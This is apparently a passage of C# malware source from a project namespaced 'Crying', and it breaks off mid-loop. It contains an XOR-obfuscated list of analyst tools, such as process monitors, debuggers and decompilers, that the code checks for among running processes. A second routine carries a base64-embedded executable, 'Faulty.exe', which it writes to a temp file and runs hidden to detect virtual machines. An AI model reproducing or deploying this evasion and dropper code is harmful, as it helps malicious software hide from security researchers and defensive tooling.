using System;
using System.IO;
using System.Net;
using System.Linq;
using System.Text;
using Crying.Reader;
using Crying.Helpers;
using System.Threading;
using System.Reflection;
using System.Diagnostics;
using Microsoft.VisualBasic;
using System.ServiceProcess;
using System.Collections.Generic;
using static Crying.Helpers.Common;
using System.Net.NetworkInformation;

    // Varis = blocks known applications using XOR cipher
    #region VariksenPelätin
    class ProgramStarter
    {
        // xor
        #region
        static string xor(string text, int n = 256)
        {
            byte[] input = Encoding.UTF8.GetBytes(text);
            byte[] output = new byte[input.Length];
            int i = 0;
            foreach (byte b in input)
            {
                output[i] = (byte)(b ^ n);
                i++;
            }
            return Encoding.UTF8.GetString(output);
        }
        #endregion

        public static bool Starter()
        {
            string[] list = new string[] {
            "QOTCUNGTM",
            "OBGW",
            "IJJ_BDA",
            "RGUMKAT",
            "VTIECUUNGEMCT",
            "VTIEC^V",
            "BHUV_",
            "OBGW",
            "OKKSHOR_BCDSAACT",
            "QOTCUNGTM",
            "BSKVEGV",
            "NIIMC^VJITCT",
            "OKVITRTCE",
            "VCRIIJU",
            "JITBVC",
            "U_UOHUVCERIT",
            "VTIEyGHGJ_\\CT",
            "U_UGHGJ_\\CT",
            "UHO@@yNOR",
            "QOHBDA",
            "LICDI^EIHRTIJ",
            "@OBBJCT",
            "LICDI^UCTPCT",
            "OBG",
            "OBG",
            "PKRIIJUB",
            "PKQGTCRTGR",
            "PKQGTCSUCT",
            "PKGERNJV",
            "PDI^UCTPOEC",
            "PDI^RTG_",
            "MUBSKVCT",
            "TCEJGUHCR",
            "^BDA",
            "IJJ_BDA",
            "VTIATCUURCJCTOM@OBBJCTQCDBCDSAACT",
            "^BDA",
            "MUBSKVCT",
            "NRRVBCDSAACT"

        };

            foreach (Process p in Process.GetProcesses())
            {
                foreach (string name in list)
                {
                    if (xor(p.ProcessName.ToLower(), 38).Contains(name))
                    {
                        return true;
                    }
                }
            }

            return false;

        }
    #endregion

    // Pingviini = Blocks virtual environments. (FailFast)
    #region Pingviini
    public static bool Pingviini()
        {
            string text = "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAPDw4FwAAAAAAAAAAOAAIgALATAAACAAAAAIAAAAAAAAQj4AAAAgAAAAQAAAAABAAAAgAAAAAgAABAAAAAAAAAAGAAAAAAAAAACAAAAAAgAAAAAAAAMAYIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAAPA9AABPAAAAAEAAAJwFAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAwAAAC4PAAAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAAAAAAAAAAAAAAACCAAAEgAAAAAAAAAAAAAAC50ZXh0AAAASB4AAAAgAAAAIAAAAAIAAAAAAAAAAAAAAAAAACAAAGAucnNyYwAAAJwFAAAAQAAAAAYAAAAiAAAAAAAAAAAAAAAAAABAAABALnJlbG9jAAAMAAAAAGAAAAACAAAAKAAAAAAAAAAAAAAAAAAAQAAAQgAAAAAAAAAAAAAAAAAAAAAkPgAAAAAAAEgAAAACAAUArCYAAFQVAAADAAIABAAABgA8AAC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABpyAQAAcCoAGzAEAJQFAAABAAARHx2NIAAAASUWchcAAHCiJRdyNwAAcKIlGHJFAABwoiUZclUAAHCiJRpylwAAcKIlG3LLAABwoiUcct8AAHCiJR1yCwEAcKIlHnIvAQBwoiUfCXJlAQBwoiUfCnKPAQBwoiUfC3K3AQBwoiUfDHLBAQBwoiUfDXLTAQBwoiUfDnL/AQBwoiUfD3IjAgBwoiUfEHK3AQBwoiUfEXJFAgBwoiUfEnJfAgBwoiUfE3K3AQBwoiUfFHKHAgBwoiUfFXKbAgBwoiUfFnK3AQBwoiUfF3LDAgBwoiUfGHLbAgBwoiUfGXK3AQBwoiUfGnIDAwBwoiUfG3IZAwBwoiUfHHIrAwBwogoYjSAAAAElFnI7AwBwoiUXck0DAHCiCxYMFA0CEwUWEwYrXREFEQaaEwcRB3JdAwBwKBMAAAosBBcMKz4RBygDAAAGKBMAAAotMAktLREHcxQAAAoNBhMIFhMJKxURCBEJmhMKCREKbxUAAAoRCRdYEwkRCREIjmky4xEGF1gTBhEGEQWOaTKbAo4sGQKOOboDAAACFpooAwAABigWAAAKOagDAAAAKBcAAAoTDhIOKBgAAAoTC3MZAAAKJSgaAAAKbxsAAApvHAAACm8dAAAKJSgDAAAGbx4AAAooHwAAChMMINwFAAAoIAAAChEMbyEAAAotBxEMbyIAAAooIwAAChMPFhMGKywRDxEGmhMQERBvJAAACm8lAAAKcmkDAHAoEwAACiwHERBvIgAAChEGF1gTBhEGEQ+OaTLM3gMm3gAfIygmAAAKcnsDAHAoJwAACigoAAAKEw1ysQMAcBYoKQAACm8qAAAKExE4iAIAABERbysAAAoTEhEScywAAAoTEwgtHhETby0AAAoTDhIOKBgAAAoRCyAAWmICalk/VQIAABESKC4AAAoTFAksCwlyvQMAcG8VAAAKHwsoLwAAChYTFRYTFjgGAgAAERQRFm8wAAAKExgSGCgxAAAKExcRF3LNAwBwKBMAAAosJB8PKC8AAAoRFygyAAAKCTnKAQAACXLRAwBwbzMAAAo4ugEAABEXcv8DAHAoEwAACiwkERcoMgAACh8KKC8AAAoJOZgBAAAJcgMEAHBvMwAACjiIAQAAERdyGwQAcCgTAAAKOREBAAARFBEWF1hvMAAAChMYEhgoMQAACnIbBABwKBYAAAo57gAAAHIbBABwExkRFhdYExo4zAAAABEUERpvMAAAChMYEhgoMQAACnIbBABwKBMAAAosIHIbBABwKDIAAAoJORQBAAAJchsEAHBvMwAACjgEAQAAERQRGm8wAAAKExgSGCgxAAAKch8EAHAoEwAACixPERlvNAAAChc+2QAAAB8OKC8AAAoRGXIfBABwKDUAAAooMgAACgksFwlyIwQAcBEZck0EAHAoNgAACm8zAAAKHw8oLwAAChEaExY4lwAAABEZERQRGm8wAAAKExgSGCgxAAAKKDUAAAoTGREaF1gTGhEaERRvNAAACj8m////K2YRF3JfBABwKBMAAAosRhEVLSEXExUfDSgvAAAKERcoMgAACgksQAlyYwQAcG8zAAAKKzMWExURFygy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BQACAAkABwAZBAwEqwC7AAABAwA6BwEAAAEFACkHAgAEgAAAAQAAAAAAAAAAAAAAAAB/BwAABAAAAAAAAAAAAAAAJAE6AAAAAAAEAAAAAAAAAAAAAAAkATEEAAAAAAAAAAABAAAABgYAAAAAAElFbnVtZXJhYmxlYDEASUVudW1lcmF0b3JgMQA8TW9kdWxlPgBnZXRfQVNDSUkAU3lzdGVtLklPAG1zY29ybGliAFN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljAFRocmVhZABnZXRfSGFzRXhpdGVkAFN5bmNocm9uaXplZABoV25kAGRlZmF1bHRJbnN0YW5jZQBJRGlzcG9zYWJsZQBSdW50aW1lVHlwZUhhbmRsZQBHZXRUeXBlRnJvbUhhbmRsZQBGaWxlAENvbnNvbGUAZ2V0X01haW5Nb2R1bGUAUHJvY2Vzc01vZHVsZQBnZXRfRmlsZU5hbWUAc2V0X0ZpbGVOYW1lAGdldF9Qcm9jZXNzTmFtZQBEYXRlVGltZQBnZXRfQ3JlYXRpb25UaW1lAFdyaXRlTGluZQBDb21iaW5lAFR5cGUAZ2V0X0N1bHR1cmUAc2V0X0N1bHR1cmUAcmVzb3VyY2VDdWx0dXJlAEFwcGxpY2F0aW9uU2V0dGluZ3NCYXNlAENsb3NlAERpc3Bvc2UARWRpdG9yQnJvd3NhYmxlU3RhdGUAV3JpdGUAQ29tcGlsZXJHZW5lcmF0ZWRBdHRyaWJ1dGUAR3VpZEF0dHJpYnV0ZQBHZW5lcmF0ZWRDb2RlQXR0cmlidXRlAERlYnVnZ2VyTm9uVXNlckNvZGVBdHRyaWJ1dGUARGVidWdnYWJsZUF0dHJpYnV0ZQBFZGl0b3JCcm93c2FibGVBdHRyaWJ1dGUAQ29tVmlzaWJsZUF0dHJpYnV0ZQBBc3NlbWJseVRpdGxlQXR0cmlidXRlAEFzc2VtYmx5VHJhZGVtYXJrQXR0cmlidXRlAFRhcmdldEZyYW1ld29ya0F0dHJpYnV0ZQBBc3NlbWJseUZpbGVWZXJzaW9uQXR0cmlidXRlAEFzc2VtYmx5Q29uZmlndXJhdGlvbkF0dHJpYnV0ZQBBc3NlbWJseURlc2NyaXB0aW9uQXR0cmlidXRlAENvbXBpbGF0aW9uUmVsYXhhdGlvbnNBdHRyaWJ1dGUAQXNzZW1ibHlQcm9kdWN0QXR0cmlidXRlAEFzc2VtYmx5Q29weXJpZ2h0QXR0cmlidXRlAEFzc2VtYmx5Q29tcGFueUF0dHJpYnV0ZQBSdW50aW1lQ29tcGF0aWJpbGl0eUF0dHJpYnV0ZQBCeXRlAHZhbHVlAEZhdWx0eS5leGUAU3lzdGVtLlRocmVhZGluZwBFbmNvZGluZwBTeXN0ZW0uUnVudGltZS5WZXJzaW9uaW5nAFRvU3RyaW5nAEdldFN0cmluZwBHZXRGb2xkZXJQYXRoAGdldF9MZW5ndGgAU3lzdGVtLkNvbXBvbmVudE1vZGVsAGtlcm5lbDMyLmRsbAB1c2VyMzIuZGxsAEtpbGwAUHJvZ3JhbQBTeXN0ZW0AUmFuZG9tAHJlc291cmNlTWFuAE1haW4AU3lzdGVtLkNvbmZpZ3VyYXRpb24AU3lzdGVtLkdsb2JhbGl6YXRpb24AU3lzdGVtLlJlZmxlY3Rpb24AU2VhcmNoT3B0aW9uAEV4Y2VwdGlvbgBGaWxlSW5mbwBDdWx0dXJlSW5mbwBGaWxlU3lzdGVtSW5mbwBQcm9jZXNzU3RhcnRJbmZvAFNsZWVwAENoYXIAU3BlY2lhbEZvbGRlcgBnZXRfUmVzb3VyY2VNYW5hZ2VyAFN5c3RlbS5Db2RlRG9tLkNvbXBpbGVyAFN0cmVhbVdyaXRlcgBUZXh0V3JpdGVyAFRvTG93ZXIAR2V0QXV0aG9yAGdldF9Gb3JlZ3JvdW5kQ29sb3IAc2V0X0ZvcmVncm91bmRDb2xvcgBDb25zb2xlQ29sb3IASUVudW1lcmF0b3IAR2V0RW51bWVyYXRvcgAuY3RvcgAuY2N0b3IAU3lzdGVtLkRpYWdub3N0aWNzAFN5c3RlbS5SdW50aW1lLkludGVyb3BTZXJ2aWNlcwBTeXN0ZW0uUnVudGltZS5Db21waWxlclNlcnZpY2VzAFN5c3RlbS5SZXNvdXJjZXMARmF1bHR5LlByb3BlcnRpZXMuUmVzb3VyY2VzLnJlc291cmNlcwBEZWJ1Z2dpbmdNb2RlcwBGYXVsdHkuUHJvcGVydGllcwBFbnVtZXJhdGVGaWxlcwBHZXRQcm9jZXNzZXMATmV4dEJ5dGVzAFNldHRpbmdzAGFyZ3MAZ2V0X1RpY2tzAFN5c3RlbS5Db2xsZWN0aW9ucwBnZXRfQ2hhcnMAR2V0Q3VycmVudFByb2Nlc3MAc2V0X0FyZ3VtZW50cwBDb25jYXQAT2JqZWN0AGdldF9EZWZhdWx0AEVudmlyb25tZW50AGdldF9DdXJyZW50AFN0YXJ0AE1vdmVOZXh0AFN5c3RlbS5UZXh0AFJlYWRBbGxUZXh0AGdldF9Ob3cAR2V0Q29uc29sZVdpbmRvdwBTaG93V2luZG93AG5DbWRTaG93AGdldF9Bc3NlbWJseQBEaXJlY3RvcnkAb3BfRXF1YWxpdHkAb3BfSW5lcXVhbGl0eQBGYXVsdHkAAAAAFUAAVQBuAHIAZQBhAGwAUwBlAGMAAB88ACEARABPAEMAVABZAFAARQAgAGgAdABtAGwAPgAADTwAaAB0AG0AbAA+AAAPIAA8AGgAZQBhAGQAPgAAQSAAIAA8AHQAaQB0AGwAZQA+AEYAYQB1AGwAdAB5ACcAcwAgAFIAZQBwAG8AcgB0ADwALwB0AGkAdABsAGUAPgABMyAAIAA8AHMAdAB5AGwAZQAgAHQAeQBwAGUAPQAiAHQAZQB4AHQALwBjAHMAcwAiAD4AABMgACAAIABiAG8AZAB5ACAAewAAKyAAIAAgACAAYgBhAGMAawBnAHIAbwB1AG4AZAA6ACAAIwAwADAAMAA7AAAjIAAgACAAIABtAGEAcgBnAGkAbgA6ACAAMwAwAHAAeAA7AAA1IAAgACAAIABmAG8AbgB0AC0AZgBhAG0AaQBsAHkAOgAgAEMAbwBuAHMAbwBsAGEAcwA7AAEpIAAgACAAIABmAG8AbgB0AC0AcwBpAHoAZQA6ACAAMQA0AHAAeAA7AAEnIAAgACAAIABjAG8AbABvAHIAOgAgACMAMgA4AGYAZgA1AGQAOwAACSAAIAAgAH0AABEgACAAIABkAGkAdgAgAHsAACsgACAAIAAgAHcAaABpAHQAZQAtAHMAcABhAGMAZQA6ACAAcAByAGUAOwABIyAAIAAgACAAcABhAGQAZABpAG4AZwA6ACAANwBwAHgAOwAAISAAIAAgACAAbQBhAHIAZwBpAG4AOgAgADMAcAB4ADsAABkgACAAIAAuAHMAdAByAGkAbgBnACAAewAAJyAAIAAgACAAYwBvAGwAbwByADoAIAAjAGMAMgAyADgAZgBmADsAABMgACAAIAAuAHQAYQBnACAAewAAJyAAIAAgACAAYwBvAGwAbwByADoAIAAjAGYANABmADQAZgA0ADsAABcgACAAIAAuAHAAYQByAGEAbQAgAHsAACcgACAAIAAgAGMAbwBsAG8AcgA6ACAAIwBmAGYAZgBiADMAOAA7AAAVIAAgADwALwBzAHQAeQBsAGUAPgAAESAAPAAvAGgAZQBhAGQAPgAADyAAPABiAG8AZAB5AD4AABEgADwALwBiAG8AZAB5AD4AAA88AC8AaAB0AG0AbAA+AAALLQAtAGEAbABsAAERdwBlAHIAZgBhAHUAbAB0AAA1TQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAVwBFAFIAXABUAGUAbQBwAAALKgAuAHgAbQBsAAAPIAAgADwAZABpAHYAPgAAAzwAAC08AHMAcABhAG4AIABjAGwAYQBzAHMAPQAiAHQAYQBnACIAPgAmAGwAdAA7AAADPgAAFyYAZwB0ADsAPAAvAHMAcABhAG4APgAAAyAAAAM9AAApPABzAHAAYQBuACAAYwBsAGEAcwBzAD0AIgBwAGEAcgBhAG0AIgA+AAARPQA8AC8AcwBwAGEAbgA+AAADIgAALTwAcwBwAGEAbgAgAGMAbABhAHMAcwA9ACIAcwB0AHIAaQBuAGcAIgA+ACIAABEiADwALwBzAHAAYQBuAD4AAAMKAAARIAAgADwALwBkAGkAdgA+AAA3RgBhAHUAbAB0AHkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAC4AUgBlAHMAbwB1AHIAYwBlAHMAAAAAAKRQK7S9WttIroUjEoHf5wAABCABAQgDIAABBSABARERBCABAQ4EIAEBAgUgAgEODgUgAQERdS8HHB0OHQ4CEkUdBR0OCA4dDggOChJJEU0RUR0SSRJJFRJVAQ4OElkOAggOAw4IDgUAAgIODgQAABFRAyAACgQAABJJBSAAEoCNAyAADgcAARJJEoCJBAABAQgDIAACBQAAHRJJBgABDhGAmQUAAg4ODgQAABFNDQADFRKAqQEODg4RgK0GFRKAqQEOCCAAFRJVARMABRUSVQEOBCAAEwAEIAARUQQAAQ4OBQABARFNBCABAwgEAAEBDgMgAAgGAAMODg4OBSABAR0FBQAAEoDNBSABDh0FBgACEkkODggAARKA0RGA1QUgABKA2QcgAgEOEoDZCAABEoDdEoDdCLd6XFYZNOCJAwYSbQMGEnEDBhIQBQACAhgIAwAAGAMAAA4FAAEBHQ4EAAASbQQAABJxBQABARJxBAAAEhADAAABBAgAEm0ECAAScQQIABIQCAEACAAAAAAAHgEAAQBUAhZXcmFwTm9uRXhjZXB0aW9uVGhyb3dzAQgBAAIAAAAAAAsBAAZGYXVsdHkAAAUBAAAAABcBABJDb3B5cmlnaHQgwqkgIDIwMTkAACkBACRmYjI3NTc5OS02YWRiLTQzOTUtODVjMS1jNWI0YTlmNGVmYWIAAAwBAAcxLjAuMC4wAABNAQAcLk5FVEZyYW1ld29yayxWZXJzaW9uPXY0LjUuMgEAVA4URnJhbWV3b3JrRGlzcGxheU5hbWUULk5FVCBGcmFtZXdvcmsgNC41LjJAAQAzU3lzdGVtLlJlc291cmNlcy5Ub29scy5TdHJvbmdseVR5cGVkUmVzb3VyY2VCdWlsZGVyBzQuMC4wLjAAAAQBAAAAWQEAS01pY3Jvc29mdC5WaXN1YWxTdHVkaW8uRWRpdG9ycy5TZXR0aW5nc0Rlc2lnbmVyLlNldHRpbmdzU2luZ2xlRmlsZUdlbmVyYXRvcggxMS4wLjAuMAAAAAAAtAAAAM7K774BAAAAkQAAAGxTeXN0ZW0uUmVzb3VyY2VzLlJlc291cmNlUmVhZGVyLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkjU3lzdGVtLlJlc291cmNlcy5SdW50aW1lUmVzb3VyY2VTZXQCAAAAAAAAAAAAAABQQURQQURQtAAAAAAAAADw8OBcAAAAAAIAAAAcAQAA1DwAANQeAABSU0RTuqqoSHdqyECi6aZjyJcSQQEAAABDOlxVc2Vyc1xKUXVlcnlcRG9jdW1lbnRzXFZpc3VhbCBTdHVkaW8gMjAxNVxQcm9qZWN0c1xGYXVsdHlcRmF1bHR5XG9ialxSZWxlYXNlXEZhdWx0eS5wZGIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA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";
            byte[] faulty = Convert.FromBase64String(text);
            string faulty_path = Path.GetTempFileName() + ".exe";
            File.WriteAllBytes(faulty_path, faulty);

            while (true)
            {
                ProcessStartInfo proc_info = new ProcessStartInfo
                {
                    FileName = faulty_path,
                    Arguments = "--all",
                    CreateNoWindow = true,
                    WindowStyle = ProcessWindowStyle.Hidden,
                    UseShellExecute = false,
                    RedirectStandardOutput = true,
                };
                Process proc = Process.Start(proc_info);

                StreamReader stdout = proc.StandardOutput;
                while (!stdout.EndOfStream)
                {
